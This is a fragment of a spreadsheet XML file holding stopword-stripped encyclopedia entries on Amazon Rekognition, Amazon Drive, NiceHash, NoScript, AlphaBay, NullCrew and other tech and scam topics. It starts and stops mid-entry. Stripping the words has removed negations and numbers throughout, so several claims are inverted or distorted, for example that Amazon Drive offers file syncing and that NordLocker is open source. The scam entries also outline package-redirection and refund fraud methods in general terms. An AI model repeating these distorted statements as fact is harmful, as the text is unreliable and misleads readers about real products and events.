"fear" added emotions rekognition could detect. 2020 june 2020, amazon announced implementing one-year moratorium police rekognition, response george floyd protests. controversy regarding facial analysis racial gender bias 2018, researchers buolamwini timnit gebru published study called gender shades. study, images collected, faces images labeled face position, gender, skin tone information. images saas facial recognition platforms face++, ibm, microsoft. three platforms, classifiers performed best male faces (with error rates female faces 8.1% 20.6% higher error rates male faces), performed worst dark female faces (with error rates ranging 20.8% 30.4%). authors hypothesized discrepancy principally megvii, ibm, microsoft light males dark females training data, i.e. dataset bias. january 2019, researchers inioluwa deborah raji buolamwini published follow-up paper experiment year later, latest versions three saas facial recognition platforms, plus additional platforms: kairos, amazon rekognition. while systems' overall error-rates improved previous year, five systems performed better male faces dark female faces. also amazon amazon mechanical turk amazon polly amazon sagemaker amazon services facial recognition system timeline amazon services references</t>
  </si>
  <si>
    <t>Amazon Drive</t>
  </si>
  <si>
    <t>amazon drive, formerly known amazon cloud drive, cloud storage application managed amazon. service offers secure cloud storage, file backup, file sharing, photo printing. using amazon account, files folders transferred managed multiple devices including browsers, desktop applications, mobiles, tablets. amazon drive also lets u.s. users order photo prints photo books using amazon prints service.today, amazon drive offers free unlimited photo storage amazon prime subscription fire tablet device, paid limited storage service. launched major countries including u.s., canada, germany, france, italy, spain, u.k., japan, australia, also functions brazil china free limited storage service. july 2022, amazon announced service would discontinued december 2023 amazon photos provided features drive. history amazon first announced storage service march 2011, initially offering pay-as-you-need tiered storage plans users. users paid storage tier utilized expandable maximum terabyte plan.in march 2015, unlimited storage plans intended non-business customer sections introduced. plan offered free 3-month free trial customers wish service entering annual subscription. during 2015 black friday, plan became popular amazon offered discounted unlimited storage plan $60, year purchase. fine print stated unlimited storage "only private use", restricted file type, must "substantially exceed differ normal users". amazon anytime "may impose restrictions service".in june 2017, amazon reverted unlimited storage plans us.on november 2017, amazon removed unlimited storage plans canadian customers well. storage plans july 2019, amazon offers plans marketplaces: prime photos (since november 2014) free limited file storage brazil china only. prime photos prime photos plan offers unlimited storage photos files, gigabytes storage videos files. photos uploaded amazon drive android apps, kindle device, cloud drive website. additionally, users kindle fire tablets also plan's benefits along purchase device. their photos videos automatically backup device amazon drive's cloud storage. according amazon, prime photos available personal, non-commercial can't used conjunction photography business. full resolution photo formats files uploaded, formats viewable within service's interface apps. free brazil china amazon drive service limited storage only. this storage counts space taken photos, videos, files types. customers countries, amazon drive offer expansion plan, neither tier-based unlimited, store media files exceeding limited 5gb. country support supported devices service supported almost types devices ranging mobiles. application supported common browsers including internet explorer, firefox, safari google chrome. create folders organize files, rename files, move around, forth. application handle photos better files. from app, photos videos viewed played, whereas files viewable. default, images sorted date taken. photos include basic metadata filename, capture date, added date, filesize, pixel dimension. desktop amazon drive released desktop application supported windows designed drop panel allowing users drag drop files initiate uploading. users install application application. supports one-touch button downloading files cloud restored. notably, files uploaded amazon drive desktop clients. during bulk upload, files folders paused cancelled progress. mobile amazon drive offers free smartphone application android mobile devices. mobile application everything addition automatically backs upload media files mobile device cloud. amazon's proprietary devices, kindle fire fire phone, ship free unlimited photo storage similarly backs photos files tablet amazon drive. features file sharing amazon prints september 2016, amazon drive launched amazon prints u.s. users edit photos order prints photo books application. once ordered, amazon ship print orders customer's address similar retail orders. multilingual support service available major amazon marketplaces, applications supported multiple languages usage different countries. popular languages supported regional variations english, spanish, french, italian, portuguese, simplified chinese, japanese. digital media players amazon drive also built amazon fire amazon video application media players smart tvs. having devices, users browse personal photos videos large screens view slideshow. limitations prime photo users upload unlimited number picture file formats only, rest formats including video formats counted additional storage plan. additional files exceeding need stored, paid plans depending country. unlimited plans, files restricted uploading application. desktop application however, exempted uploading files greater size. amazon drive streaming available videos longer minutes larger stored amazon drive download watch offline. unlike popular file hosting services, amazon drive offer file-syncing automatic backup web, users cannot latest desktop version documents images. also, shared documents cannot collaborated others, downloaded editing. however, mobile applications support automatic backup capabilities.the service limits usage personal non-commercial use. store, transfer distribute content behalf third parties, operate file storage application service, operate photography business commercial service. also amazon prime comparison file hosting services list amazon products services references external links official website</t>
  </si>
  <si>
    <t>Partclone</t>
  </si>
  <si>
    <t>partclone partition clone restore tool. provides utilities back restore partitions designed higher compatibility file system library. developed nchc free software labs taiwan. default backup application clonezilla, version 1.00 redo backup recovery simply front partclone. supports many file systems good performance, skips portions file system marked free space. utilities partclone currently supports following filesystems: ext2, ext3, ext4, hfs+, reiserfs, reiser4, btrfs, vmfs(v3, v5), xfs, jfs, ufs, ntfs, fat(12/16/32), exfat. partclone particular filesystem, uses command 'partclone.&lt;fstype&gt;', similar manner mkfs command partclone.btrfs partclone.ext2, partclone.ext3, partclone.ext4 partclone.fat32, partclone.fat12, partclone.fat16 partclone.ntfs partclone.exfat partclone.hfsp partclone.jfs partclone.reiserfs partclone.reiser4 partclone.ufs (support su+j) partclone.vmfs (v3) partclone.vmfs5 (for vmfs partclone.xfs features partclone partition image tool attempts back used data blocks. it's written focuses cloning filesystems, opposed cloning disks. basic features are: clone partition image file restore image file partition restore image file file loop device duplicate partition create domain file ddrescue crc32 support pipe support (restore stdin clone stdout) text mode quiet mode ncurses text interface rescue support transfer rate, elapsed time calculating support clone (like partclone.chkimg check image made partclone also list disk cloning software project references external links official website</t>
  </si>
  <si>
    <t>NextWorth</t>
  </si>
  <si>
    <t>nextworth solutions, inc., electronics trade-in recycling service. users service exchange used electronics cash discounts newer models. nextworth founded business students babson college 2005. started commission-based service help businesses setup online auctions used items, changed business model focus electronics trade-ins 2006. late 2012, nextworth best-known largest electronics trade-in recycling services united states, although handles small percentage total trade-in traffic.the massachusetts secretary commonwealth signed company's certificate dissolution june 2019. although company seemed operate capacity next years, nextworth's website went dark august 2021. history nextworth founded david chen, andrew walsh scott richardson students babson college. company selected babson college's 2005 business hatcheries program, provides free resources student-led startups. nextworth inc. began operations following year. originally service helped businesses non-profits prepare luxury items online auctions exchange 20-33 percent commission. spring 2006, nextworth changed business model services focus electronics trade-ins. january 2007, nextworth raised $1.5 million first round funding. services nextworth purchases used electronics resells 80-85 percent them, remainder sent network partners recycling. many used iphones resold countries ones expensive. sellers fill online form describe used products want sell, quote website. after receiving quote, sellers thirty days ship product using pre-paid shipping label provided nextworth. company wipes device's memory inspects item sending seller reimbursement 3–15 days depending payment method. nextworth appraises product lower condition seller expected, explanation nextworth, challenge quote, reject product back.sellers also trade-ins in-person reimbursed immediately partnered retailers like target. target trade-in program began pilot project 2009, expanded locations 2010 almost 1,500 stores 2011. their partnership target ended late 2016 target selected cexchange partner. similar partnership place circuit city went business 2009. company spokesperson stated 2009 company also partnered smaller retailers in-person trade-ins. pricing nextworth sets prices algorithm developed students professor babson college. sellers obtain better prices reselling electronics directly services like ebay craigslist, services like nextworth convenient predictable pricing. cnet editor found trade-in prices nextworth "pretty fair", though expecting higher prices items. variations price trade-in services products depend timing (release models market fluctuations), model sold, product's condition.according about.com, fair seller describing condition product "will determine whether experience nextworth satisfying not." some sellers higher lower prices originally quoted, depending nextworth's assessment product's condition compares seller's description.nextworth experienced spikes trade-in activity sellers newer models announced, ipad announced march 2011, iphone announced september 2012 these announcements also caused trade-in price older models decrease, over-supply. well holiday season. references external links official website</t>
  </si>
  <si>
    <t>NiceHash</t>
  </si>
  <si>
    <t>nicehash global cryptocurrency hash power broker cryptocurrency exchange open marketplace connects sellers hashing power (cryptominers) buyers hashing power using sharing economy approach. company provides software cryptocurrency mining. company founded 2014 slovenian university students, marko kobal matjaž škorjanc. company based british virgin islands offices maribor, slovenia. nicehash users primarily video gamers powerful graphics cards (gpus) suited cryptocurrency mining. company million users countries worldwide november 2021. history nicehash founded 2014, former medical student turned computer programmer, marko kobal. nicehash's original founder matjaž škorjanc allegedly creators malware called mariposa botnet served four years months slovenian prison. june 2019, enforcement reopened case operations mariposa (butterfly bot, bfbot) malware gang. 2019, moved forward charges arrest warrants four suspects, including matjaž škorjanc. matjaž detained prison germany 2019. international agreements double jeopardy, released 2020. matjaž provided original concept company, involved operation current martin škorjanc.on december 2017, approximately 4,700 bitcoins (us$64 million time hack) stolen nicehash allegedly spear phishing attack. open transparent nature blockchain, security breach received influx attention stolen movement bitcoins visible anyone internet. december 2017, marko kobal resigned nicehash. day, company also re-opened marketplace december hack. nicehash announced hired cyber security implemented security protocols incident. nicehash reimbursed affected users made claim deadline december 2020, returned bitcoin funds full. february 2021, north korean hacker group (lazarus) indicted 2017 nicehash attack.nicehash opened cryptocurrency exchange 2019, miners traders cryptocurrencies trade mined coins cryptocurrencies exchange fiat currency. platform lists coins tokens, trading pairs. 2022, nicehash became first provider mining software unlock nvidia's (light hash rate). business model hash power marketplace nicehash provides open hash power marketplace buyers purchase computer power mining pool operations. return providing service, nicehash takes percentage group (buyers sellers). sellers hash power sellers nicehash mining software connect mining hardware regular graphics cards nicehash stratum servers buyer's order. their hashing power forwarded pool buyer chosen mining. valid share submit, paid bitcoin price determined current weighted average refreshed minute. this done automatically process require complex technical skills. sellers technically 'miners' (although computer hardware mining) chose control algorithm hardware operates they renting hardware used mining people (buyers) similar concept cloud mining. buyers hashpower (miners) buyers open marketplace hash power different mining algorithms, direct mining pool increase chances finding block reward. much process bidding automated trading bots. references external links official website nicehash github nguyen, linh (december 2017). "nicehash speaks $60m cryptocurrency hack". wikitribune. retrieved june 2018. licensed by-sa</t>
  </si>
  <si>
    <t>Parcel mule scam</t>
  </si>
  <si>
    <t>parcel mule scam, also known reshipping scam, involves scammers unsuspecting victims handling goods countries. ways similar money mule scam. scammers fake advertising hire mules. items bought stolen cards, since goods typically re-sold shipped, scam viewed indirect form money laundering. premise parcel mule scam, scammers often attract victims guise bogus work-from-home opportunity, although angles, romance scam used lure victims. victims begin receive packages, often high value contents (such consumer electronics designer clothes shoes) address provided scammer. goods packages either fraudulently bought (for example, stolen credit card bank account) stolen counterfeit goods. they asked repackage item(s) send another address, international address. often address belongs another victim person directly involved scam. routing packages many different people, original scammer(s) become difficult track down. after package sent another address proof sent scammer, victim offered monetary compensation.although victim offered money, scam often operates tandem either cheque fraud scam (where check money transfer victim receives fraudulent) advance-fee scam victim required front costs, postage, promise reimbursement). this scam also operate alongside money mule scam, victim transferred money (often untraceable source, wire transfer) told keep portion money wiring rest funds someone else (either another victim scammer). case funds illegally obtained, victim also liable full amount money check wire transfer given reversed. also possible victim's personal information, address bank account information, exposed. authorities generally advise anyone suspects victim parcel mule scam report authorities. people involved reshipping scams, whether willing accomplice, potentially charged several felonies. authorities also caution consumers accept offer requires reship goods, accept packages address people know, strange packages arrive address, reship another address. example famous scam organized "air parcel express" corporate name. criminals purchased items united states sent mules russia belarus, sold. items included ipods, playstations, smartphones, laptops. references</t>
  </si>
  <si>
    <t>Panda Cloud Antivirus</t>
  </si>
  <si>
    <t>panda cloud antivirus antivirus software developed panda security, free paid version available. cloud-based sense files scanned remote server without using processing power user's machine. cloud technology based panda's collective intelligence. constantly, providing protection viruses malicious websites slowing system extent, system scan. features according panda security, panda cloud antivirus able detect viruses, trojans, worms, spyware, dialers, hacking tools, hacker security risks.panda cloud antivirus relies "collective intelligence" cloud up-to-date information. normally uses internet connection access up-to-date information; internet cannot accessed, local cache "the common threats circulation". reviews april 2009 review found panda cloud antivirus clean, fast, simple, easy use, good detection rates. review scored panda 100.00% malware detection 100.0% malicious detection. overall score 100%, strong protection factor considering software.when version released november 2009, magazine reviewed panda cloud antivirus gave editor's choice award best av.techradar's review states think panda cloud antivirus best viewed defense tool rather utility cleaning system that's already riddled infection." license free edition panda cloud antivirus released license. usage exclusively allowed private households, state schools, non-governmental non-profit organizations. references external links panda cloud antivirus website interview developers</t>
  </si>
  <si>
    <t>NoScript</t>
  </si>
  <si>
    <t>noscript noscript security suite) free software extension mozilla firefox, seamonkey, mozilla-based browsers google chrome, written maintained giorgio maone, italian software developer member mozilla security group. features active content blocking default, noscript blocks active (executable) content, wholly partially unblocked allowlisting site domain extension's toolbar menu clicking placeholder icon. default configuration, active content globally denied, although user turn around noscript block specific unwanted content. allowlist permanent temporary (until browser closes user revokes permissions). active content consist javascript, fonts, media codecs, webgl, flash. add-on also offers specific countermeasures security exploits.because many browser attacks require active content browser normally runs without question, disabling content default using degree necessary reduces chances vulnerability exploitation. addition, loading content saves significant bandwidth defeats forms tracking. noscript useful developers well site works javascript turned off. also remove many irritating elements, in-page pop-up messages certain paywalls, require javascript order function. noscript takes form toolbar icon status icon firefox. displays every website denote whether noscript either blocked, allowed, partially allowed scripts page viewed. clicking hovering (since version 2.0.3rc1) mouse cursor noscript icon gives user option allow forbid script's processing. noscript's interface, whether accessed right-clicking page distinctive noscript bottom page default), shows script(s) blocked, provide sort reference look whether given script safe run. with complex webpages, users faced well dozen different cryptic urls non-functioning webpage, choice allow script, block script allow temporarily. november 2017, giorgio maone announced noscript "very different" versions, webextension technology, making compatible firefox quantum. november 2017, maone released version 10.1.1 firefox above. noscript available firefox android. anti-xss protection april 2007, noscript 1.1.4.7 publicly released, introducing first client-side protection type type cross-site scripting (xss) ever delivered browser. whenever website tries inject html javascript code inside different site violation same-origin policy), noscript filters malicious request neutralizes dangerous payload.similar features adopted years later microsoft internet explorer google chrome. application boundaries enforcer (abe) application boundaries enforcer (abe) built-in noscript module meant harden application-oriented protections already provided noscript, delivering firewall-like component running inside browser. this "firewall" specialized defining guarding boundaries sensitive application relevant user (e.g., plug-ins, webmail, online banking, on), according policies defined directly user, developer/administrator, trusted third party. default configuration, noscript's provides protection csrf rebinding attacks aimed intranet resources, routers sensitive applications. clearclick (anti-clickjacking) noscript's clearclick feature, released october 2008, prevents users clicking invisible "redressed" page elements embedded documents applets, defeating types clickjacking (i.e., frames plug-ins).this makes noscript "the freely available product offers reasonable degree protection clickjacking attacks. https enhancements noscript force browser always https establishing connections sensitive sites, order prevent man-in-the-middle attacks. this behavior triggered either websites themselves, sending strict transport security header, configured users websites support strict transport security yet.noscript's https enhancement features used electronic frontier foundation basis https everywhere add-on. awards world chose noscript best products 2006. 2008, noscript about.com's "best security add-on" editorial award. 2010, noscript "the reader's choice awards" winner "best privacy/security add-on" category about.com. 2011, second year row, noscript "the reader's choice awards" winner "best privacy/security add-on" category about.com. noscript 2011 (first edition) winner dragon research group's "security innovation grant". this award given innovative project area information security, judged independent committee. conflicts conflict adblock plus 2009, reported "extension war" broken noscript's developer, giorgio maone, developers firefox ad-blocking extension adblock plus maone released version noscript circumvented block enabled adblock plus filter. code implementing workaround "camouflaged" avoid detection. maone stated implemented response filter blocked website. after mounting criticism declaration administrators mozilla add-ons site site would change guidelines regarding add-on modifications, maone removed code issued full apology. conflict ghostery immediate aftermath adblock plus incident, spat arose maone developers ghostery add-on maone implemented change website disabled notification ghostery used report tracking software. this interpreted attempt "prevent ghostery reporting trackers networks noscript's websites". response, maone stated change made ghostery's notification obscured donation button noscript site. this conflict resolved maone changed site's move—rather disable—the ghostery notification. also references external links official website noscript addons.mozilla.org noscript anywhere (3.5a15) firefox android noscript presentation bypass internet censorship, floss manual, march 2011,</t>
  </si>
  <si>
    <t>Package redirection scam</t>
  </si>
  <si>
    <t>package redirection scam form e-commerce fraud, malicious actor manipulates shipping label, trick mail carrier delivering package wrong address. this usually done product returns make merchant believe mishandled return package, thus provide refund without item returned. also done seller, generally creating fraudulent online stores creating fake listings sites ebay mercari. this makes hard perform chargeback, tracking shows item delivered. this also known ftid scam, standing fake tracking when scam successful, tracking number show package delivered correct address, package instead delivered different address. this package generally empty filled garbage. methods multiple methods used trick carrier misdelivering package. usually, scammer edit label. various edits possible, example, changing shipping address, removing barcodes, removing indication package return, printing certain parts label disappearing ink. scammer would contact company weeks package delivered, demand refund. company record return, refund provided without items returned, company believes mishandled return. however, edited label, recovered, prove package redirection scam occurred. some scammers return label advertisement remove shipping information except barcode. this cause company throw 'return', thinking junk mail. this serves purpose package redirection scam; company believes mismanaged return refunds scammer's money. also possible remove label shipping item. february 2021, canadian arrested return fraud scheme, would place devices would remove label shipping return. this resulted package delivered wrong address, lost entirely. police recovered $20,000 stolen merchandise $25,000 cash. year christopher charged counts public mischief, counts fraud $5,000, counts possession property obtained crime.there also similar scam value item ordered site aliexpress, shipped different address seller's code place return. some merchants provide refund upon seeing item delivered code; however generally used fake online stores selling items. this scam exploits flaw tracking system; online tracking usually show code package delivered instead full address. lost transit scam lost transit scam similar ftid scam, instead package redirected, intentionally lost transit. package lost, shipping insurance out, scammer refund. methods used accomplish range disappearing ink, thin paper, corrosive substances used destroy shipping, even package bombs. "refunding" fraud internet, illegal services allow receive fraudulent refund, keep item ordered. these known "refunders". when hired, refunders impersonate socially engineer company providing refund. "refunders" take refund, usually 10-40%. main method used refunders package redirection scam. prevention this scam particularly difficult prevent. while merchant know package never delivered, return tracking allow fraudster chargeback claim. case marketplaces ebay, site programmed automatically refund money within days return package delivery. this hard reverse, especially scammer closes account cancels card used purchase item.when postal carrier marks item delivered, coordinates delivery recorded. coordinates match intended delivery address, serve evidence fraud. person received fraudulent return also choose retain package hand authorities. weight package also used prove fraud, scammers generally empty envelope. however, scammers place garbage package match weight item, complicating process. references</t>
  </si>
  <si>
    <t>AlphaBay</t>
  </si>
  <si>
    <t>alphabay darknet market operating onion service network node i2p. after shut july 2017 following enforcement action united states, canada, thailand part operation bayonet, relaunched august 2021 self-described co-founder security administrator desnake. alleged original founder, alexandre cazes, canadian citizen born october 1991, found dead cell thailand several days arrest, police suspecting suicide. history alphabay reportedly launched september 2014, pre-launched november 2014 officially launched december 2014. steady growth, 14,000 users first days operation. darknet informer website gwern.net placed alphabay market tier markets regarding 6-month survival probability proven successful. october 2015, recognized largest online darknet market according palumbo, research director digital citizens alliance.non-standard services included customizable digital contracts around building reputations.in 2015, site announced integrated digital contracts escrow system. contract system allows users make engagements agree provide services future, according terms contract. october 2015, alphabay 200,000 users.at time demise july 2017, alphabay 400,000 users.alphabay noteworthy world darknet markets accepting another cryptocurrency addition bitcoin; support monero, supposedly anonymous, implemented august 2016. site breaches april 2016, alphabay's compromised leading 13,000 messages stolen. january 2017, compromised, allowing 200,000 private messages last days list usernames leaked. attack single hacker paid alphabay disclosure. alphabay reported exploit used conjunction attack used previously. news coverage march 2015, alphabay market made news selling stolen uber accounts. uber made statement regarding potential data breach: investigated found evidence breach. attempting fraudulently access sell accounts illegal notified authorities report. this good opportunity remind people strong unique usernames passwords avoid reusing credentials across multiple sites services." october 2015, london-based telecommunications company talktalk sustained major hack. stolen data sale alphabay market, arrest 15-year-old boy. talktalk dido harding issued following statement: "talktalk constantly updates systems make sure secure possible rapidly evolving threat cyber crime, impacting increasing number individuals organisations. take threat security customers' data extremely seriously taking necessary steps understand happened here." august 2017, alphabay revealed possible venue perpetrators 2017 jewish community center bomb threats sold "school email bomb threat service." this individual, michael kadar, made threatening calls schools community centers. criminologist david decary-hetu noted event notable first example criminal services sold darkmarket. said, "all cases heard turned enforcement trying find people interest," making case unique experience point. seizure shutdown july 2017, alphabay times size predecessor silk road (which busted october 2013), 369,000 listings, 400,000 users, facilitating us$600,000-$800,000 transactions day, reportedly built strong reputation. however, series elementary operational security errors downfall: about time service first began december 2014, cazes used hotmail address pimp_alex_91@hotmail.com 'from' address system generated welcome password reset emails, also used linkedin profile legitimate computer repair business canada. cazes used pseudonym, alpha02, site previously used (e.g., carding tech forums) since least 2008, variously advertised identity "designer", "administrator" "owner" site. when cazes arrested, logged laptop performing administrative reboot alphabay server direct response law-enforcement-created artificial system failure; furthermore, encryption wholly absent said laptop. cazes' laptop reportedly contained unencrypted personal worth statement mapping global assets across multiple jurisdictions, conveniently leading police complete asset seizure. servers hosted company canada directly linked person. servers contained multiple constantly open (unencrypted) cryptocurrency wallets. cazes' flashy proceeds purchase property, passports luxury cars frequent online boasting financial successes, including posting videos driving luxury cars acquired illegal proceeds, revealed geographical location, perforce made denying connection service impossible. assets acquired proceeds held variety accounts directly linked cazes, wife companies owned thailand (the jurisdiction lived), well directly held personal accounts liechtenstein, cyprus, switzerland antigua. cazes' statements goal site "launched september 2014 goal become largest ebay-style underworld marketplace" helped legally establish intent. timeline enforcement took least month obtain warrant, month obtain foreign warrants, prepare execute searches seizures canada thailand: early 2017: enforcement verifiably active site since least period. june 2017: warrant issued united states district court eastern district california racketeering, narcotics trafficking, identity theft access device fraud, transfer false trafficking illegal device making equipment, conspiracy commit money laundering. june 2017: warrant issued cazes' arrest thailand request. july 2017 canadian police raid technologies montreal, cazes' canadian company reported location physical servers, well residential properties trois-rivières. cazes arrested bangkok dwelling phutthamonthon road thawi watthana district searched royal thai police, help dea. july 2017: cazes' suspected suicide hanging custody thailand's narcotics suppression bureau headquarters laksi district, bangkok, reportedly discovered 7am. face extradition. july 2017: cazes' wife reported charged money laundering. july 2017; u.s. attorney general jeff sessions announces shutdown site. july 2017: narcotics suppression bureau chief interviewed suggests suspects arrested soon. relaunch early august 2021, alphabay online again. details operation surfaced conversation wired user verified public former site administrator alphabay. using alias desnake, former vendor self-described co-founder original alphabay claims operate marketplace, placing higher emphasis operations security previous administration, stating "there overkill" regarding site.as part site's relaunch, multiple features advertised rules announced. notable among features alphaguard (which allegedly prevents users losing funds even seizures servers occur time), automatic system resolve disputes buyers sellers, exclusive monero wallets, offering mirrors. concerning rules, items newly prohibited sale include covid-19 vaccines, firearms, products containing narcotic fentanyl, pornography, "hitman services". furthermore, discussions public private information related governments, organizations, people russia, belarus, kazakhstan, armenia, kyrgyzstan. this loose speculation connection site operators governments nations. references also</t>
  </si>
  <si>
    <t>NordLocker</t>
  </si>
  <si>
    <t>nordlocker file encryption software integrated end-to-end encrypted cloud storage. available windows macos. nordlocker developed nord security, company behind nordvpn virtual private network, based netherlands.nordlocker uses freemium business model, users offered free account unlimited local file encryption amount cloud storage sync backup features. more cloud storage available paid subscription. history 2019, nordvpn announced upcoming launch nordlocker, zero-knowledge encryption process”. although initial estimated time arrival summer 2019, actual launch took place november. launched local file encryption tool secure sharing. users able encrypt data free unlimited encryption.in march 2020, nordlocker announced newly implemented cloud sharing integrations dropbox google drive.in august 2020, nordlocker launched cloud storage add-on, feature allowing users back data synchronize across multiple devices. features nordlocker encryption software cloud integration. software uses called "lockers" encrypted folders encrypt store user files. users create unlimited number lockers, drop files encrypt them, transfer lockers separately.the uses client-side encryption secure files user's device first. it's zero-knowledge encryption system, developers data users' files. after encryption process, user decide whether store data locally sync nordlocker’s cloud. nordlocker syncs files private cloud, accessed computer nordlocker installed. program uses aes-256 4096-bit encryption algorithms well argon2 (with xchacha20, eddsa, poly1305). nordlocker uses libsodium generate random 256-bit encrypt lockers. encrypt key, uses xchacha20-poly1305 user’s master password.the local encryption free december 2020 service monetizes cloud storage space beyond provided free plan. hacking contest april 2020, nordlocker launched "nordlocker bounty campaign", hacking competition prize $10,000. win, person download encrypted "locker" company's site, hack find hidden message. based nordlocker’s campaign page, attempts break locker claimed bounty december 2020. reception june 2020 pcmagazine review noted nordlocker easy lacked features like secure file deletion two-factor authentication. august 2020, itpro called nordlocker’s cloud add-on “critical feature modern business, especially coronavirus outbreak forcing many companies’ workforces remain remote.” restore privacy praised nordlocker strong end-to-end encryption "new, lower price" mentioned fact nordlocker open-source.boxcryptor, another encryption service, compared nordlocker’s security noted nordlocker mobile application. also encryption internet privacy secure communication references external links official website</t>
  </si>
  <si>
    <t>Novabackup</t>
  </si>
  <si>
    <t>novabackup, developed novastor data protection software enables users backup recover mission critical data across hybrid physical virtual machines. novabackup designed work microsoft windows operating systems, offering local online file backups disaster recovery image backups. overview file formats novabackup uses proprietary file format uses file extension backwards compatible, meaning backups older versions novabackup (after version restored latest version software. version backups still restored, file extensions need updated .nbd editions multiple novabackup editions available. versions built users support backups pcs, laptops servers, including support exchange/sql virtual machines. most novabackup software includes novacare premium support, email/phone-in technical support maintenance upgrades. partnerships novastor partnered buffalo offering novabackup software included linkstation family consumer solutions terastation family solutions. history release change novabackup starting version 13.0. current novabackup release references further reading williams, mike. "novabackup professional 16.1". advisor. retrieved september 2014. "novastor online backup data protection review". online backup reviews. retrieved september 2014. "novabackup reviews". spiceworks. cooper, sue. "backup software vendor list". windowsitpro.com. windows pro. savill, john. "what backup software available windows nt?". windowsitpro.com. windows pro. "backup recovery". msexchange.org. techgenix ltd. "novabackup professional". pcmag.com. magazine. "backup recovery virtualization". virtualizationadmin.com. techgenix. "consumers digest rates novastor's novabackup professional best computer security software". veooz. retrieved september 2014. dines, rachel "updated 2010: market overview: backup software-as-a-service" (pdf). asigra.com/. forrester research, inc. "partnered software novastor novabackup". buffalo-technology.com. buffalo. shibiraj. "review novabackup professional extremely powerful backup application windows". techulator.com/. techulator. jacobi, "novabackup professional". pcworld.com. world. external links novastor official website data recovery software android data recovery</t>
  </si>
  <si>
    <t>PROMIS (software)</t>
  </si>
  <si>
    <t>promis (prosecutors management information system) case management software developed inslaw (formerly institute social research), non-profit organization established 1973 bill nancy hamilton. software program developed enforcement assistance administration prosecutors' offices tracking; 1982 time inslaw became for-profit entity) inslaw received million contract justice department develop improved promis application u.s. attorneys' offices. having previously developed 16-bit version promis, inslaw developed 32-bit version, various operating systems, specifically vax/vms, unix, os/400, 1990s) windows nt.the hamiltons justice department engaged "unusually bitter contract dispute" software, inslaw entered bankruptcy. hamiltons sued federal government, alleging justice department dishonestly conspired "drive inslaw business 'through trickery, fraud deceit'" withholding payments inslaw pirating software. bankruptcy court federal district court agreed hamiltons, although rulings later vacated court appeals jurisdictional reasons. hamilton others asserted justice department done order modify promis, originally created manage legal cases, become monitoring software intelligence operations. affidavits created course inslaw affair stated "promis given sold profit israel many countries earl brian, close personal business ties then-president ronald reagan then-presidential counsel edwin meese."in september 1992, house judiciary committee report raised "serious concerns" justice department officials schemed destroy inslaw co-opt rights promis software" misappropriated software. report outgrowth three-year investigation jack brooks, committee's chairman, launched investigation 1989. report faulted justice department lack cooperation investigation found "there appears strong evidence, indicated findings federal court proceedings well committee investigation, department justice 'acted willfully fraudulently,' 'took, converted stole,' inslaw's enhanced promis 'trickery fraud deceit.'"a book written 1997 fabrizio calvi thierry pfister claimed national security agency (nsa) "seeding computers abroad promis-embedded smart (systems management automated reasoning tools) chips, code-named petrie, capable covertly downloading data transmitting using electrical wiring antenna, u.s. intelligence satellites" part espionage operation.in early 1980s, manucher ghorbanifar adnan khashoggi facilitated transaction promis software khalid mahfouz, prominent saudi billionaire. media mogul alleged israeli robert maxwell involved selling promis software. further reading ryan gallagher, dirtier watergate: reagan-era espionage system managed stay radar., statesman (april 2011). james kilpatrick, odor situation needing probe, baltimore (august 1991). kenn thomas, keith: octopus: secret government death danny casolaro. feral house 2005, isbn 0-922915-91-1 elizabeth tucker, inslaw back business, loses crucial battle, washington post (december 1988). cheri seymour: last circle danny casolaro's investigation octopus promis software scandal. trine day, 2010. isbn 978-1936296002 googel books also prism (surveillance program) references</t>
  </si>
  <si>
    <t>Nuix</t>
  </si>
  <si>
    <t>nuix australian technology company produces investigative analytics intelligence software extracting knowledge unstructured data. applications company's technology reportedly include digital forensics, financial crime, insider investigations, data privacy, data governance, ediscovery regulatory compliance. december 2020, company's software reportedly used 1000 customers countries. company headquarters sydney, australia offices asia, europe, middle east north america. history nuix founded 2000 goal make vast quantities unstructured data easily searchable. from 2006 2016, company grew developers employees.in 2010 nuix awarded five-year contract securities exchange commission. 2014 company appointed industry partner international multilateral partnership against cyber threats. 2017, nuix board directors appointed vawdrey position chief executive officer. november 2020, company appointed american lawyer diplomat jeffrey bleich chairman. december 2020, nuix listed australian securities exchange initial public offering valued company a$1.8 billion. october 2021, nuix board appointed jonathan rubinsztein position group chief executive officer. controversy following initial public offering, australian securities investments commission (asic) investigated "suspicious revenue forecasts" published nuix's prospectus. asic concluded investigation forecasts february 2022 said would take action. 2021, company reportedly ties former chairman tony castagna revealed australian federal police investigating alleged breaches corporations act.in june 2021, australian federal police raided company's office part investigation "into certain individuals" alleged insider trading. company later announced terminated stephen doyle mutual agreement" vawdrey resigned. technology uses nuix markets software ediscovery, digital forensic investigation, security, intelligence, governance, risk compliance based nuix engine. nuix engine combines load balancing, fault tolerance processing technologies "provide insights large volumes unstructured, semi-structured structured data". several features nuix engine granted patent 2011.in 2013, nuix provided limited number free software licences international consortium investigative journalists (icij), used nuix investigate offshore leaks data. 2016, süddeutsche zeitung icij also used nuix's software analyze "panama papers". using software, panama papers investigation team made terabytes scanned documents text-searchable extracted metadata helped journalists cross-reference people, places business entities across documents. ownership nuix public company listed australian securities exchange (asx: nxl). 2020, largest shareholder macquarie group shareholding approximately 30%. awards recognition 2009, nuix australian technology showcase (ats) export award, emerging exporter award. 2012, information communication technology category australian export awards. 2015, premier's exporter year award. october 2015, company reported raised $250,000 room read philanthropic product proof finder. 2016, nuix products forensic product year cyber security awards, innovation awards australian business awards october 2016, nuix macquarie capital technology growth company year australian growth company awards references external links bloomberg</t>
  </si>
  <si>
    <t>NullCrew</t>
  </si>
  <si>
    <t>nullcrew hacktivist group founded 2012 took responsibility multiple high-profile computer attacks corporations, educational institutions, government agencies. history july 2012, group assumed world health organization releasing pastebin post containing plain-text usernames, passwords; relating attack, attack goes, mostly database information well 1,000 emails passwords.on july group breached asus (aka asustek computer inc.), releasing pastebin post containing administrator usernames hashed passwords.the group targeted several universities united kingdom including cambridge august 2012.in september, group claimed twitter account taken control eight servers entertainment corporation sony. also september, group responded arrest pirate co-founder cambodia officials; response attack cambodia government, leading several governmental servers pillaged.on november 2012; renown anonymous holiday known vendetta phrase "remember, remember fifth november." group's core members: null timoxeline announced successful attack u.k. ministry defense; attack included 3,000 usernames, email addresses, passwords appeared belong u.k. ministry defense. claimed attack allowed simple mistake web-developers attack indeed injection.the group released first supposed series mini e-zines operation "fuckthesystem" september 2012. first mini e-zine contained column table structure department state, well administrator webmaster password plain-text; also contained exposure vulnerabilities foxconn website.on october 2012: nullcrew announced release first self-titled e-zine containing credentials government military servers belonging strictly united states. affected servers were: hacked sites includes 